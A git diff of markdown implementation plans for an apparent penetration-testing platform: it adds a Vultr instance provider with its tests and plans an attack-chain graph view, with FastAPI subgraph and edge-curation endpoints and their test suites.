+class TestVultrProviderDestroy:
+    @pytest.mark.asyncio
+    async def test_destroy_204(self):
+        async def handler(request: httpx.Request) -> httpx.Response:
+            return httpx.Response(204)
+
+        transport = httpx.MockTransport(handler)
+        client = httpx.AsyncClient(transport=transport, base_url="https://api.vultr.com/v2")
+        provider = VultrProvider(client=client)
+
+        await provider.destroy_node("vtr-abc")  # should not raise
+
+    @pytest.mark.asyncio
+    async def test_destroy_404_idempotent(self):
+        async def handler(request: httpx.Request) -> httpx.Response:
+            return httpx.Response(404)
+
+        transport = httpx.MockTransport(handler)
+        client = httpx.AsyncClient(transport=transport, base_url="https://api.vultr.com/v2")
+        provider = VultrProvider(client=client)
+
+        await provider.destroy_node("vtr-abc")  # should not raise
+
+
+class TestVultrProviderListByTag:
+    @pytest.mark.asyncio
+    async def test_list_nodes_by_tag(self):
+        async def handler(request: httpx.Request) -> httpx.Response:
+            assert "tag=opentools-ephemeral-proxy" in str(request.url)
+            return httpx.Response(200, json={
+                "instances": [
+                    {"id": "vtr-1"},
+                    {"id": "vtr-2"},
+                ],
+            })
+
+        transport = httpx.MockTransport(handler)
+        client = httpx.AsyncClient(transport=transport, base_url="https://api.vultr.com/v2")
+        provider = VultrProvider(client=client)
+
+        ids = await provider.list_nodes_by_tag("opentools-ephemeral-proxy")
+        assert ids == ["vtr-1", "vtr-2"]
+
+    @pytest.mark.asyncio
+    async def test_list_empty(self):
+        async def handler(request: httpx.Request) -> httpx.Response:
+            return httpx.Response(200, json={"instances": []})
+
+        transport = httpx.MockTransport(handler)
+        client = httpx.AsyncClient(transport=transport, base_url="https://api.vultr.com/v2")
+        provider = VultrProvider(client=client)
+
+        ids = await provider.list_nodes_by_tag("opentools-ephemeral-proxy")
+        assert ids == []
+
+
+class TestVultrProviderWaitUntilReady:
+    @pytest.mark.asyncio
+    async def test_waits_for_ip_assignment(self):
+        call_count = 0
+
+        async def handler(request: httpx.Request) -> httpx.Response:
+            nonlocal call_count
+            call_count += 1
+            if call_count < 3:
+                return httpx.Response(200, json={
+                    "instance": {
+                        "id": "vtr-abc", "status": "active",
+                        "power_status": "running", "main_ip": "0.0.0.0",
+                    },
+                })
+            return httpx.Response(200, json={
+                "instance": {
+                    "id": "vtr-abc", "status": "active",
+                    "power_status": "running", "main_ip": "149.28.1.1",
+                },
+            })
+
+        transport = httpx.MockTransport(handler)
+        client = httpx.AsyncClient(transport=transport, base_url="https://api.vultr.com/v2")
+        provider = VultrProvider(client=client)
+
+        ip = await provider.wait_until_ready("vtr-abc", poll_interval=0.01, max_polls=10)
+        assert ip == "149.28.1.1"
+        assert call_count == 3
+
+    @pytest.mark.asyncio
+    async def test_timeout_raises(self):
+        async def handler(request: httpx.Request) -> httpx.Response:
+            return httpx.Response(200, json={
+                "instance": {
+                    "id": "vtr-abc", "status": "pending",
+                    "power_status": "stopped", "main_ip": "0.0.0.0",
+                },
+            })
+
+        transport = httpx.MockTransport(handler)
+        client = httpx.AsyncClient(transport=transport, base_url="https://api.vultr.com/v2")
+        provider = VultrProvider(client=client)
+
+        with pytest.raises(ProvisioningTimeout):
+            await provider.wait_until_ready("vtr-abc", poll_interval=0.01, max_polls=3)
+```
+
+- [ ] **Step 2: Run tests to verify they fail**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_infra_vultr.py::TestVultrProviderCreate::test_create_sends_correct_payload -v`
+Expected: FAIL with `ModuleNotFoundError`
+
+- [ ] **Step 3: Implement VultrProvider**
+
+```python
+# packages/cli/src/opentools/scanner/infra/vultr.py
+"""VultrProvider — ephemeral Vultr instance provisioning via REST API.
+
+Implements CloudNodeProvider ABC. Uses httpx.AsyncClient for all HTTP
+calls — fully async, never blocks the event loop.
+
+IMPORTANT: The sshkey_id array is REQUIRED in the creation payload.
+Without it, the instance boots with no authorized SSH keys and the
+automated tunnel establishment will fail with Permission denied.
+"""
+
+from __future__ import annotations
+
+import uuid
+
+import httpx
+
+from opentools.scanner.infra.provider import CloudNodeProvider
+
+
+class VultrProvider(CloudNodeProvider):
+    """Provision ephemeral instances via the Vultr API."""
+
+    def __init__(self, client: httpx.AsyncClient) -> None:
+        self._client = client
+
+    @classmethod
+    def from_token(cls, api_token: str) -> VultrProvider:
+        """Create a provider with a new httpx client using the given API token."""
+        client = httpx.AsyncClient(
+            base_url="https://api.vultr.com/v2",
+            headers={"Authorization": f"Bearer {api_token}"},
+            timeout=30.0,
+        )
+        return cls(client=client)
+
+    async def create_node(
+        self, region: str, ssh_public_key: str, tags: list[str],
+    ) -> str:
+        """Create a Vultr instance. ssh_public_key must be a Vultr SSH key UUID."""
+        resp = await self._client.post("/instances", json={
+            "region": region,
+            "plan": "vc2-1c-0.5gb",
+            "os_id": 2284,  # Ubuntu 24.04 LTS
+            "label": f"ot-proxy-{uuid.uuid4().hex[:8]}",
+            "sshkey_id": [ssh_public_key],
+            "tags": tags,
+            "backups": "disabled",
+            "activation_email": False,
+        })
+        resp.raise_for_status()
+        return resp.json()["instance"]["id"]
+
+    async def poll_status(self, provider_id: str) -> tuple[str, str | None]:
+        """Poll instance status. Returns ("active", ip) only when IP is assigned."""
+        resp = await self._client.get(f"/instances/{provider_id}")
+        resp.raise_for_status()
+        instance = resp.json()["instance"]
+
+        vultr_status = instance.get("status", "")
+        power_status = instance.get("power_status", "")
+        main_ip = instance.get("main_ip", "0.0.0.0")
+
+        # Vultr can report "active" before IP is assigned
+        if (
+            vultr_status == "active"
+            and power_status == "running"
+            and main_ip != "0.0.0.0"
+        ):
+            return "active", main_ip
+
+        return "creating", None
+
+    async def destroy_node(self, provider_id: str) -> None:
+        """Destroy a Vultr instance. Idempotent — 404 is not an error."""
+        resp = await self._client.delete(f"/instances/{provider_id}")
+        if resp.status_code not in (204, 404):
+            resp.raise_for_status()
+
+    async def list_nodes_by_tag(self, tag: str) -> list[str]:
+        """List all instance IDs with the given tag (for orphan sweeping)."""
+        resp = await self._client.get("/instances", params={"tag": tag})
+        resp.raise_for_status()
+        instances = resp.json().get("instances", [])
+        return [inst["id"] for inst in instances]
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_infra_vultr.py -v`
+Expected: All PASS
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add packages/cli/src/opentools/scanner/infra/vultr.py packages/cli/tests/test_scanner/test_infra_vultr.py
+git commit -m "feat(infra): add VultrProvider with SSH key injection and 0.0.0.0 IP guard"
+```
+
+---
+
+## Appendix: Combined Build Order (All Phases)
+
+For reference, here is the complete task sequence across all three phases:
+
+**Phase A — Dynamic DAG Mutation (existing plan)**
+1. KillChainState + IntelBundle models
+2. OutputAnalyzer protocol + NmapAnalyzer
+3. MutationStrategy protocol + RedisProbeStrategy
+4. Engine integration (mutation layer in `_mark_completed`)
+
+**Phase B — Ephemeral Proxy Routing (existing plan)**
+5. Add `env` param to `run_streaming`
+6. CloudNodeProvider ABC + DigitalOcean implementation
+6b. **VultrProvider implementation** ← NEW
+7. `ephemeral_proxy` context manager + shielded teardown
+8. ProxiedShellExecutor
+9. Orphan sweeper
+
+**Phase C — HITL Approval Gate** ← NEW
+10. Model additions (ApprovalRequirement, AWAITING_APPROVAL, ScanTask fields)
+11. ApprovalRegistry (in-memory notification hub)
+12. Engine integration (gate phase in `_execute_task`)
+13. FastAPI gate endpoints (list, approve, reject)
diff --git a/docs/superpowers/plans/2026-04-13-phase3c2-attack-chain-graph-view.md b/docs/superpowers/plans/2026-04-13-phase3c2-attack-chain-graph-view.md
new file mode 100644
index 0000000..88b0dd1
--- /dev/null
+++ b/docs/superpowers/plans/2026-04-13-phase3c2-attack-chain-graph-view.md
@@ -0,0 +1,1865 @@
+# Phase 3C.2: Attack Chain Graph View — Implementation Plan
+
+> **For agentic workers:** REQUIRED SUB-SKILL: Use superpowers:subagent-driven-development (recommended) or superpowers:executing-plans to implement this plan task-by-task. Steps use checkbox (`- [ ]`) syntax for tracking.
+
+**Goal:** Add an interactive per-engagement attack chain graph visualization to the web dashboard, with edge curation (confirm/reject), MITRE ATT&CK phase coloring, and server-side filtering for scale.
+
+**Architecture:** Standalone Vue page at `/engagements/:id/chain` wraps `force-graph` (vasturiano). Backend serves filtered subgraphs via a new `GET /api/chain/subgraph` endpoint that caps nodes and filters by severity/status. Edge curation uses `PATCH /api/chain/relations/:id`. No new database tables — builds on 3C.1 models.
+
+**Tech Stack:** FastAPI, SQLAlchemy async, Vue 3, PrimeVue, `force-graph` (vasturiano), TanStack Query
+
+**Spec:** `docs/superpowers/specs/2026-04-13-phase3c2-attack-chain-graph-view-design.md`
+
+---
+
+## File Map
+
+### Backend (new/modified)
+
+| File | Action | Responsibility |
+|------|--------|---------------|
+| `packages/web/backend/app/routes/chain.py` | Modify | Add `GET /api/chain/subgraph` and `PATCH /api/chain/relations/{relation_id}` endpoints |
+| `packages/web/backend/app/services/chain_service.py` | Modify | Add `subgraph_for_engagement()` and `update_relation_status()` methods |
+| `packages/web/backend/app/services/chain_dto.py` | Modify | Add `relation_to_link_dict()` for force-graph link shape with drift computation |
+| `packages/web/backend/tests/test_chain_subgraph.py` | Create | Tests for subgraph endpoint filtering, capping, neighborhood, drift |
+| `packages/web/backend/tests/test_chain_curation.py` | Create | Tests for relation PATCH (valid transitions, invalid status, auth scoping) |
+
+### Frontend (new/modified)
+
+| File | Action | Responsibility |
+|------|--------|---------------|
+| `packages/web/frontend/src/views/ChainGraphView.vue` | Create | Page component — data fetching, filter state, layout orchestration |
+| `packages/web/frontend/src/components/ForceGraphCanvas.vue` | Create | Wrapper around `force-graph` — rendering config, custom draw callbacks, interaction events |
+| `packages/web/frontend/src/components/ChainDetailPanel.vue` | Create | Right drawer — node details, edge details with reasons, curation buttons |
+| `packages/web/frontend/src/components/ChainFilterToolbar.vue` | Create | Severity/status toggle buttons |
+| `packages/web/frontend/src/components/ChainLegend.vue` | Create | Bottom bar — severity color key, edge style key, node count |
+| `packages/web/frontend/src/components/ChainEmptyState.vue` | Create | Empty state + rebuild progress polling |
+| `packages/web/frontend/src/router/index.ts` | Modify | Add `/engagements/:id/chain` route |
+| `packages/web/frontend/src/views/EngagementDetailView.vue` | Modify | Add "View Attack Chain" button |
+
+---
+
+## Task 1: Backend — `relation_to_link_dict` DTO with drift computation
+
+**Files:**
+- Modify: `packages/web/backend/app/services/chain_dto.py`
+
+This task adds the conversion function that produces the force-graph link shape with inline drift computation. All subsequent backend tasks depend on this.
+
+- [ ] **Step 1: Write the `relation_to_link_dict` function**
+
+Add to `packages/web/backend/app/services/chain_dto.py`:
+
+```python
+def relation_to_link_dict(relation: FindingRelation) -> dict[str, Any]:
+    """Convert a CLI ``FindingRelation`` to a force-graph link dict.
+
+    Includes drift detection: if the relation has status USER_CONFIRMED
+    and the current reasons differ from the confirmed_at_reasons snapshot,
+    drift is True.
+    """
+    status_value = (
+        relation.status.value
+        if hasattr(relation.status, "value")
+        else str(relation.status)
+    )
+
+    # Drift: true if user confirmed but reasons have since changed
+    drift = False
+    if status_value == "user_confirmed" and relation.confirmed_at_reasons is not None:
+        current_rules = sorted(r.rule for r in relation.reasons)
+        confirmed_rules = sorted(r.rule for r in relation.confirmed_at_reasons)
+        drift = current_rules != confirmed_rules
+
+    return {
+        "id": relation.id,
+        "source": relation.source_finding_id,
+        "target": relation.target_finding_id,
+        "value": relation.weight,
+        "status": status_value,
+        "drift": drift,
+        "reasons": [r.rule for r in relation.reasons],
+        "relation_type": relation.llm_relation_type,
+        "rationale": relation.llm_rationale,
+    }
+```
+
+- [ ] **Step 2: Verify the module still imports cleanly**
+
+Run: `cd packages/web/backend && python -c "from app.services.chain_dto import relation_to_link_dict; print('OK')"`
+Expected: `OK`
+
+- [ ] **Step 3: Commit**
+
+```bash
+git add packages/web/backend/app/services/chain_dto.py
+git commit -m "feat(chain): add relation_to_link_dict DTO with drift detection"
+```
+
+---
+
+## Task 2: Backend — `subgraph_for_engagement` service method
+
+**Files:**
+- Modify: `packages/web/backend/app/services/chain_service.py`
+
+Adds the service method that queries the store for findings + relations scoped to an engagement, applies severity/status filters, enforces max_nodes cap, and returns the force-graph-shaped response.
+
+- [ ] **Step 1: Add imports at top of chain_service.py**
+
+Add these imports to the existing import block:
+
+```python
+from app.services.chain_dto import relation_to_link_dict
+```
+
+- [ ] **Step 2: Add `subgraph_for_engagement` method to `ChainService`**
+
+```python
+    async def subgraph_for_engagement(
+        self,
+        session: AsyncSession,
+        *,
+        user_id: uuid.UUID,
+        engagement_id: str,
+        severities: set[str] | None = None,
+        statuses: set[str] | None = None,
+        max_nodes: int = 500,
+        seed_finding_id: str | None = None,
+        hops: int = 2,
+        format: str = "force-graph",
+    ) -> dict[str, Any]:
+        """Build a filtered subgraph for one engagement.
+
+        Returns a dict with 'graph' (force-graph or canonical shape)
+        and 'meta' (total_findings, rendered_findings, filtered, generation).
+        """
+        from opentools.chain.config import get_chain_config
+        from opentools.chain.query.graph_cache import GraphCache
+        from opentools.chain.query.adapters import to_canonical_json, to_force_graph
+        from opentools.chain.types import RelationStatus
+
+        from sqlalchemy import select, func
+        from app.models import Finding, ChainFindingRelation
+
+        store = chain_store_from_session(session)
+        await store.initialize()
+
+        # Count total findings in engagement (for meta)
+        total_stmt = select(func.count()).select_from(Finding).where(
+            Finding.engagement_id == engagement_id,
+            Finding.user_id == user_id,
+            Finding.deleted_at.is_(None),
+        )
+        total_result = await session.execute(total_stmt)
+        total_findings = total_result.scalar() or 0
+
+        # Fetch findings for this engagement, applying severity filter
+        finding_stmt = select(Finding).where(
+            Finding.engagement_id == engagement_id,
+            Finding.user_id == user_id,
+            Finding.deleted_at.is_(None),
+        )
+        if severities:
+            finding_stmt = finding_stmt.where(Finding.severity.in_(severities))
+        finding_stmt = finding_stmt.limit(max_nodes)
+
+        finding_result = await session.execute(finding_stmt)
+        findings = list(finding_result.scalars().all())
+        finding_ids = {f.id for f in findings}
+
+        if not finding_ids:
+            empty_graph = {"nodes": [], "links": []} if format == "force-graph" else {"schema_version": "1.0", "nodes": [], "edges": [], "metadata": {}}
+            return {
+                "graph": empty_graph,
+                "meta": {
+                    "total_findings": total_findings,
+                    "rendered_findings": 0,
+                    "filtered": bool(severities) or total_findings > max_nodes,
+                    "generation": 0,
+                },
+            }
+
+        # Default status filter
+        if statuses is None:
+            statuses = {"auto_confirmed", "user_confirmed", "candidate"}
+
+        # Fetch relations where both endpoints are in finding_ids
+        rel_stmt = select(ChainFindingRelation).where(
+            ChainFindingRelation.user_id == user_id,
+            ChainFindingRelation.source_finding_id.in_(finding_ids),
+            ChainFindingRelation.target_finding_id.in_(finding_ids),
+            ChainFindingRelation.status.in_(statuses),
+        )
+        rel_result = await session.execute(rel_stmt)
+        relations_orm = list(rel_result.scalars().all())
+
+        # Build nodes
+        nodes = [
+            {
+                "id": f.id,
+                "name": f.title,
+                "severity": f.severity,
+                "tool": f.tool,
+                "phase": f.phase,
+            }
+            for f in findings
+        ]
+
+        # Build links via DTO
+        from opentools.chain.models import FindingRelation as DomainRelation, RelationReason
+        from opentools.chain.stores.postgres_async import _orm_to_relation
+
+        links = [
+            relation_to_link_dict(_orm_to_relation(r))
+            for r in relations_orm
+        ]
+
+        # Get latest generation from most recent linker run
+        from app.models import ChainLinkerRun
+        gen_stmt = (
+            select(ChainLinkerRun.generation)
+            .where(ChainLinkerRun.user_id == user_id)
+            .order_by(ChainLinkerRun.started_at.desc())
+            .limit(1)
+        )
+        gen_result = await session.execute(gen_stmt)
+        generation = gen_result.scalar() or 0
+
+        if format == "force-graph":
+            graph = {"nodes": nodes, "links": links}
+        else:
+            graph = {
+                "schema_version": "1.0",
+                "nodes": [{"id": n["id"], "type": "finding", "severity": n["severity"], "tool": n["tool"], "title": n["name"]} for n in nodes],
+                "edges": [{"source": l["source"], "target": l["target"], "weight": l["value"], "status": l["status"], "symmetric": False, "reasons": l["reasons"], "relation_type": l["relation_type"], "rationale": l["rationale"]} for l in links],
+                "metadata": {"generation": generation, "max_weight": max((l["value"] for l in links), default=0)},
+            }
+
+        return {
+            "graph": graph,
+            "meta": {
+                "total_findings": total_findings,
+                "rendered_findings": len(findings),
+                "filtered": bool(severities) or len(findings) < total_findings,
+                "generation": generation,
+            },
+        }
+```
+
+- [ ] **Step 3: Verify the module still imports**
+
+Run: `cd packages/web/backend && python -c "from app.services.chain_service import ChainService; print('OK')"`
+Expected: `OK`
+
+- [ ] **Step 4: Commit**
+
+```bash
+git add packages/web/backend/app/services/chain_service.py
+git commit -m "feat(chain): add subgraph_for_engagement service method"
+```
+
+---
+
+## Task 3: Backend — `update_relation_status` service method
+
+**Files:**
+- Modify: `packages/web/backend/app/services/chain_service.py`
+
+Adds the service method for edge curation — updates relation status to `user_confirmed` or `user_rejected`, snapshots `confirmed_at_reasons_json` on confirm.
+
+- [ ] **Step 1: Add `update_relation_status` method to `ChainService`**
+
+```python
+    async def update_relation_status(
+        self,
+        session: AsyncSession,
+        *,
+        user_id: uuid.UUID,
+        relation_id: str,
+        new_status: str,
+    ) -> dict[str, Any] | None:
+        """Update a relation's status for edge curation.
+
+        Only 'user_confirmed' and 'user_rejected' are valid.
+        On confirm, snapshots current reasons_json into confirmed_at_reasons_json.
+        Returns the updated relation dict, or None if not found.
+        """
+        from sqlalchemy import select, update
+        from app.models import ChainFindingRelation
+        from datetime import datetime, timezone
+        from opentools.chain.stores.postgres_async import _orm_to_relation
+        from app.services.chain_dto import relation_to_dict
+
+        # Fetch the relation, scoped to user
+        stmt = select(ChainFindingRelation).where(
+            ChainFindingRelation.id == relation_id,
+            ChainFindingRelation.user_id == user_id,
+        )
+        result = await session.execute(stmt)
+        relation = result.scalar_one_or_none()
+        if relation is None:
+            return None
+
+        # Update status
+        relation.status = new_status
+        relation.updated_at = datetime.now(timezone.utc)
+
+        # On confirm, snapshot current reasons for drift detection
+        if new_status == "user_confirmed":
+            relation.confirmed_at_reasons_json = relation.reasons_json
+
+        session.add(relation)
+        await session.commit()
+        await session.refresh(relation)
+
+        return relation_to_dict(_orm_to_relation(relation))
+```
+
+- [ ] **Step 2: Verify import**
+
+Run: `cd packages/web/backend && python -c "from app.services.chain_service import ChainService; print('OK')"`
+Expected: `OK`
+
+- [ ] **Step 3: Commit**
+
+```bash
+git add packages/web/backend/app/services/chain_service.py
+git commit -m "feat(chain): add update_relation_status for edge curation"
+```
+
+---
+
+## Task 4: Backend — Subgraph and curation route endpoints
+
+**Files:**
+- Modify: `packages/web/backend/app/routes/chain.py`
+
+Adds `GET /api/chain/subgraph` and `PATCH /api/chain/relations/{relation_id}`.
+
+- [ ] **Step 1: Add new Pydantic models for the endpoints**
+
+Add to `packages/web/backend/app/routes/chain.py`, after the existing model classes:
+
+```python
+class SubgraphMeta(BaseModel):
+    total_findings: int
+    rendered_findings: int
+    filtered: bool
+    generation: int
+
+
+class SubgraphResponse(BaseModel):
+    graph: dict
+    meta: SubgraphMeta
+
+
+class RelationStatusUpdate(BaseModel):
+    status: str
+```
+
+- [ ] **Step 2: Add the subgraph endpoint**
+
+```python
+@router.get("/subgraph", response_model=SubgraphResponse)
+async def get_subgraph(
+    engagement_id: str,
+    severity: Optional[str] = None,
+    status: Optional[str] = None,
+    max_nodes: int = 500,
+    seed_finding_id: Optional[str] = None,
+    hops: int = 2,
+    format: str = "force-graph",
+    db: AsyncSession = Depends(get_db),
+    user: User = Depends(get_current_user),
+    service: ChainService = Depends(get_chain_service),
+) -> SubgraphResponse:
+    severities = set(severity.split(",")) if severity else None
+    statuses = set(status.split(",")) if status else None
+
+    result = await service.subgraph_for_engagement(
+        db,
+        user_id=user.id,
+        engagement_id=engagement_id,
+        severities=severities,
+        statuses=statuses,
+        max_nodes=max_nodes,
+        seed_finding_id=seed_finding_id,
+        hops=hops,
+        format=format,
+    )
+    return SubgraphResponse(
+        graph=result["graph"],
+        meta=SubgraphMeta(**result["meta"]),
+    )
+```
+
+- [ ] **Step 3: Add the relation curation endpoint**
+
+```python
+@router.patch("/relations/{relation_id}")
+async def update_relation(
+    relation_id: str,
+    body: RelationStatusUpdate,
+    db: AsyncSession = Depends(get_db),
+    user: User = Depends(get_current_user),
+    service: ChainService = Depends(get_chain_service),
+):
+    valid_statuses = {"user_confirmed", "user_rejected"}
+    if body.status not in valid_statuses:
+        raise HTTPException(
+            status_code=status.HTTP_422_UNPROCESSABLE_ENTITY,
+            detail=f"status must be one of: {', '.join(valid_statuses)}",
+        )
+
+    result = await service.update_relation_status(
+        db, user_id=user.id, relation_id=relation_id, new_status=body.status,
+    )
+    if result is None:
+        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="relation not found")
+    return result
+```
+
+- [ ] **Step 4: Verify the app starts**
+
+Run: `cd packages/web/backend && python -c "from app.main import app; print('OK')"`
+Expected: `OK`
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add packages/web/backend/app/routes/chain.py
+git commit -m "feat(chain): add subgraph and relation curation endpoints"
+```
+
+---
+
+## Task 5: Backend — Subgraph endpoint tests
+
+**Files:**
+- Create: `packages/web/backend/tests/test_chain_subgraph.py`
+
+- [ ] **Step 1: Write subgraph endpoint tests**
+
+Create `packages/web/backend/tests/test_chain_subgraph.py`:
+
+```python
+"""Subgraph endpoint tests (Phase 3C.2)."""
+
+import uuid
+from datetime import datetime, timezone
+
+import pytest
+
+from app.models import ChainFindingRelation, Engagement, Finding
+from tests.conftest import test_session_factory
+
+NOW = datetime.now(timezone.utc)
+
+
+async def _get_user_id(auth_client) -> uuid.UUID:
+    eng_resp = await auth_client.post("/api/v1/engagements", json={
+        "name": "_uid_probe", "target": "127.0.0.1", "type": "pentest",
+    })
+    assert eng_resp.status_code == 201
+    eng_id = eng_resp.json()["id"]
+    async with test_session_factory() as session:
+        from sqlalchemy import select
+        from app.models import Engagement as Eng
+        result = await session.execute(select(Eng).where(Eng.id == eng_id))
+        eng = result.scalar_one()
+        return eng.user_id
+
+
+async def _seed_engagement(user_id, eng_id):
+    async with test_session_factory() as session:
+        session.add(Engagement(
+            id=eng_id, user_id=user_id, name="Test", target="10.0.0.0/24",
+            type="pentest", created_at=NOW, updated_at=NOW,
+        ))
+        await session.commit()
+
+
+async def _seed_finding(user_id, eng_id, finding_id, severity="high", phase=None):
+    async with test_session_factory() as session:
+        session.add(Finding(
+            id=finding_id, user_id=user_id, engagement_id=eng_id,
+            tool="nmap", severity=severity, title=f"Finding {finding_id}",
+            phase=phase, created_at=NOW,
+        ))
+        await session.commit()
+
+
+async def _seed_relation(user_id, src_id, tgt_id, rel_id, status="auto_confirmed", weight=0.8):
+    async with test_session_factory() as session:
+        session.add(ChainFindingRelation(
+            id=rel_id, user_id=user_id, source_finding_id=src_id,
+            target_finding_id=tgt_id, weight=weight, status=status,
+            symmetric=False, created_at=NOW, updated_at=NOW,
+        ))
+        await session.commit()
+
+
+@pytest.mark.asyncio
+async def test_subgraph_empty_engagement(auth_client):
+    """Engagement with no findings returns empty graph."""
+    user_id = await _get_user_id(auth_client)
+    await _seed_engagement(user_id, "eng-empty")
+
+    resp = await auth_client.get("/api/chain/subgraph?engagement_id=eng-empty")
+    assert resp.status_code == 200
+    data = resp.json()
+    assert data["graph"]["nodes"] == []
+    assert data["graph"]["links"] == []
+    assert data["meta"]["total_findings"] == 0
+    assert data["meta"]["rendered_findings"] == 0
+
+
+@pytest.mark.asyncio
+async def test_subgraph_returns_nodes_and_links(auth_client):
+    """Seeded findings and relations appear in subgraph response."""
+    user_id = await _get_user_id(auth_client)
+    await _seed_engagement(user_id, "eng-sub")
+    await _seed_finding(user_id, "eng-sub", "f-1", severity="critical")
+    await _seed_finding(user_id, "eng-sub", "f-2", severity="high")
+    await _seed_relation(user_id, "f-1", "f-2", "rel-1")
+
+    resp = await auth_client.get("/api/chain/subgraph?engagement_id=eng-sub")
+    assert resp.status_code == 200
+    data = resp.json()
+    assert len(data["graph"]["nodes"]) == 2
+    assert len(data["graph"]["links"]) == 1
+    link = data["graph"]["links"][0]
+    assert link["id"] == "rel-1"
+    assert link["source"] == "f-1"
+    assert link["target"] == "f-2"
+    assert "drift" in link
+
+
+@pytest.mark.asyncio
+async def test_subgraph_severity_filter(auth_client):
+    """Severity filter excludes non-matching findings."""
+    user_id = await _get_user_id(auth_client)
+    await _seed_engagement(user_id, "eng-sev")
+    await _seed_finding(user_id, "eng-sev", "f-crit", severity="critical")
+    await _seed_finding(user_id, "eng-sev", "f-low", severity="low")
+
+    resp = await auth_client.get("/api/chain/subgraph?engagement_id=eng-sev&severity=critical")
+    assert resp.status_code == 200
+    data = resp.json()
+    assert len(data["graph"]["nodes"]) == 1
+    assert data["graph"]["nodes"][0]["severity"] == "critical"
+
+
+@pytest.mark.asyncio
+async def test_subgraph_status_filter(auth_client):
+    """Status filter excludes non-matching relations."""
+    user_id = await _get_user_id(auth_client)
+    await _seed_engagement(user_id, "eng-stat")
+    await _seed_finding(user_id, "eng-stat", "f-a")
+    await _seed_finding(user_id, "eng-stat", "f-b")
+    await _seed_relation(user_id, "f-a", "f-b", "rel-conf", status="auto_confirmed")
+    await _seed_relation(user_id, "f-b", "f-a", "rel-cand", status="candidate")
+
+    # Only auto_confirmed
+    resp = await auth_client.get(
+        "/api/chain/subgraph?engagement_id=eng-stat&status=auto_confirmed"
+    )
+    data = resp.json()
+    assert len(data["graph"]["links"]) == 1
+    assert data["graph"]["links"][0]["status"] == "auto_confirmed"
+
+
+@pytest.mark.asyncio
+async def test_subgraph_max_nodes_cap(auth_client):
+    """max_nodes caps the number of returned findings."""
+    user_id = await _get_user_id(auth_client)
+    await _seed_engagement(user_id, "eng-cap")
+    for i in range(10):
+        await _seed_finding(user_id, "eng-cap", f"f-cap-{i}")
+
+    resp = await auth_client.get("/api/chain/subgraph?engagement_id=eng-cap&max_nodes=3")
+    data = resp.json()
+    assert len(data["graph"]["nodes"]) == 3
+    assert data["meta"]["total_findings"] == 10
+    assert data["meta"]["filtered"] is True
+
+
+@pytest.mark.asyncio
+async def test_subgraph_unauthenticated(client):
+    """Unauthenticated request returns 401."""
+    resp = await client.get("/api/chain/subgraph?engagement_id=eng-x")
+    assert resp.status_code == 401
+```
+
+- [ ] **Step 2: Run the tests**
+
+Run: `cd packages/web/backend && python -m pytest tests/test_chain_subgraph.py -v`
+Expected: all tests PASS
+
+- [ ] **Step 3: Commit**
+
+```bash
+git add packages/web/backend/tests/test_chain_subgraph.py
+git commit -m "test(chain): subgraph endpoint tests — filters, cap, auth"
+```
+
+---
+
+## Task 6: Backend — Curation endpoint tests
+
+**Files:**
+- Create: `packages/web/backend/tests/test_chain_curation.py`
+
+- [ ] **Step 1: Write curation endpoint tests**
+
+Create `packages/web/backend/tests/test_chain_curation.py`:
+
+```python
+"""Relation curation (PATCH) endpoint tests (Phase 3C.2)."""
+
+import uuid
+from datetime import datetime, timezone
+
+import pytest
+
+from app.models import ChainFindingRelation, Engagement, Finding
+from tests.conftest import test_session_factory
+
+NOW = datetime.now(timezone.utc)
+
+
+async def _get_user_id(auth_client) -> uuid.UUID:
+    eng_resp = await auth_client.post("/api/v1/engagements", json={
+        "name": "_uid_probe", "target": "127.0.0.1", "type": "pentest",
+    })
+    assert eng_resp.status_code == 201
+    eng_id = eng_resp.json()["id"]
+    async with test_session_factory() as session:
+        from sqlalchemy import select
+        from app.models import Engagement as Eng
+        result = await session.execute(select(Eng).where(Eng.id == eng_id))
+        eng = result.scalar_one()
+        return eng.user_id
+
+
+async def _seed_with_relation(user_id, rel_id="rel-cur", status="candidate"):
+    async with test_session_factory() as session:
+        session.add(Engagement(
+            id="eng-cur", user_id=user_id, name="Test", target="10.0.0.1",
+            type="pentest", created_at=NOW, updated_at=NOW,
+        ))
+        await session.flush()
+        session.add(Finding(
+            id="f-cur-1", user_id=user_id, engagement_id="eng-cur",
+            tool="nmap", severity="high", title="Finding 1", created_at=NOW,
+        ))
+        session.add(Finding(
+            id="f-cur-2", user_id=user_id, engagement_id="eng-cur",
+            tool="nuclei", severity="medium", title="Finding 2", created_at=NOW,
+        ))
+        await session.flush()
+        session.add(ChainFindingRelation(
+            id=rel_id, user_id=user_id, source_finding_id="f-cur-1",
+            target_finding_id="f-cur-2", weight=0.75, status=status,
+            symmetric=False, reasons_json=b'[{"rule":"shared_strong_entity","weight_contribution":0.5,"idf_factor":null,"details":{}}]',
+            created_at=NOW, updated_at=NOW,
+        ))
+        await session.commit()
+
+
+@pytest.mark.asyncio
+async def test_confirm_candidate(auth_client):
+    """Confirming a candidate relation succeeds."""
+    user_id = await _get_user_id(auth_client)
+    await _seed_with_relation(user_id, "rel-c1", status="candidate")
+
+    resp = await auth_client.patch(
+        "/api/chain/relations/rel-c1",
+        json={"status": "user_confirmed"},
+    )
+    assert resp.status_code == 200
+    assert resp.json()["status"] == "user_confirmed"
+
+
+@pytest.mark.asyncio
+async def test_reject_candidate(auth_client):
+    """Rejecting a candidate relation succeeds."""
+    user_id = await _get_user_id(auth_client)
+    await _seed_with_relation(user_id, "rel-c2", status="candidate")
+
+    resp = await auth_client.patch(
+        "/api/chain/relations/rel-c2",
+        json={"status": "user_rejected"},
+    )
+    assert resp.status_code == 200
+    assert resp.json()["status"] == "user_rejected"
+
+
+@pytest.mark.asyncio
+async def test_toggle_confirmed_to_rejected(auth_client):
+    """User can change from confirmed to rejected."""
+    user_id = await _get_user_id(auth_client)
+    await _seed_with_relation(user_id, "rel-c3", status="user_confirmed")
+
+    resp = await auth_client.patch(
+        "/api/chain/relations/rel-c3",
+        json={"status": "user_rejected"},
+    )
+    assert resp.status_code == 200
+    assert resp.json()["status"] == "user_rejected"
+
+
+@pytest.mark.asyncio
+async def test_invalid_status_returns_422(auth_client):
+    """Setting auto_confirmed via PATCH returns 422."""
+    user_id = await _get_user_id(auth_client)
